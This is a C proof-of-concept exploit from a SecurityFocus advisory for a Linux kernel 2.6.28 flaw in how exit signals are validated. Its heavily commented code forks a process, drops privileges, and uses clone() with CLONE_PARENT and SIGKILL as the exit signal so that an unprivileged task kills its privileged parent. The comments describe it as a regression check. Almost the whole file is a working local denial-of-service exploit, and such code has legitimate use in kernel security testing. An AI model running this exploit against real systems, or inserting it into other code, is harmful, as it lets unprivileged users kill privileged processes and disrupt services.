/*
source: https://www.securityfocus.com/bid/33906/info

The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.

This weakness occurs when a privileged process runs attacker-supplied programs as child processes. Attackers may exploit this to send arbitrary signals to the privileged parent process.

A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.

Linux kernel 2.6.28 is vulnerable; other versions may also be affected.
*/
#define _GNU_SOURCE /* clone() and CLONE_PARENT are GNU extensions in <sched.h> */

#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * Entry function for the task that main() creates with clone().
 *
 * It waits one second and then terminates with exit status 2. The
 * termination is the interesting event: when this task exits, the kernel
 * sends the exit signal chosen in main()'s clone() flags to the task's
 * parent. The delay presumably lets the caller reach its own _exit()
 * first -- the listing does not say, so treat that as an assumption.
 *
 * arg is the opaque pointer forwarded by clone(); main() passes NULL and
 * it is not read here. The function never returns.
 */
static int the_child(void* arg) {
    enum { DELAY_SECONDS = 1, EXIT_STATUS = 2 };

    (void)arg;

    sleep(DELAY_SECONDS);
    _exit(EXIT_STATUS);
}
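/*
 * Regression check for the exit-signal origin-validation weakness described
 * in the header comment.
 *
 * Flow:
 *   1. fork(). The original process stays alive as the "privileged parent"
 *      and only waits; it keeps whatever credentials the program was
 *      started with.
 *   2. The forked process drops to gid 99 / uid 65534 and calls clone()
 *      with CLONE_PARENT and SIGKILL as the exit signal, then exits
 *      with status 100.
 *   3. When the cloned task (the_child) exits, the kernel delivers the exit
 *      signal to that task's parent. With CLONE_PARENT the parent is the
 *      caller's parent, i.e. the original process from step 1.
 *
 * Reading the result: on the affected kernel named in the header comment
 * the original process is killed although the request came from a task
 * that had already dropped its privileges.
 * NOTE(review): on a kernel with the weakness fixed the original process
 * should presumably keep running -- confirm against the vendor advisory.
 *
 * Every step that can fail is checked. In particular, a failed privilege
 * drop ends the run with exit status 1 instead of continuing, because a
 * signal sent with unchanged credentials says nothing about the weakness
 * and would be misread as a positive result. In that case the waiting
 * original process is left running and has to be stopped by hand.
 */
int main(int argc, const char* argv[]) {
    /* Size of the stack handed to the cloned task (value from the listing). */
    enum { CHILD_STACK_SIZE = 4096 };

    (void)argc;
    (void)argv;

    int ret = fork();
    if (ret < 0) {
        perror("fork");
        _exit(1);
    } else if (ret > 0) {
        /* Original process: block instead of spinning; it only has to exist. */
        for (;;) {
            pause();
        }
    }

    /*
     * Forked process from here on. Drop the group first, then the user:
     * once the uid is unprivileged the gid can no longer be changed.
     * 65534 is commonly "nobody"; 99 is presumably the matching group on
     * the author's system -- verify before relying on either.
     */
    if (setgid(99) != 0) {
        perror("setgid");
        _exit(1);
    }
    if (setuid(65534) != 0) {
        perror("setuid");
        _exit(1);
    }

    /* Never freed: this process exits immediately after clone(). */
    char* stack = malloc(CHILD_STACK_SIZE);
    if (stack == NULL) {
        perror("malloc");
        _exit(1);
    }

    /*
     * The low byte of the clone() flags is the signal sent to the parent
     * when the new task terminates; CLONE_PARENT makes the new task a
     * sibling of this process rather than its child.
     */
    int flags = SIGKILL | CLONE_PARENT;

    /* clone() expects the top of the stack: stacks grow downwards here. */
    if (clone(the_child, stack + CHILD_STACK_SIZE, flags, NULL) == -1) {
        perror("clone");
        _exit(1);
    }

    _exit(100);
}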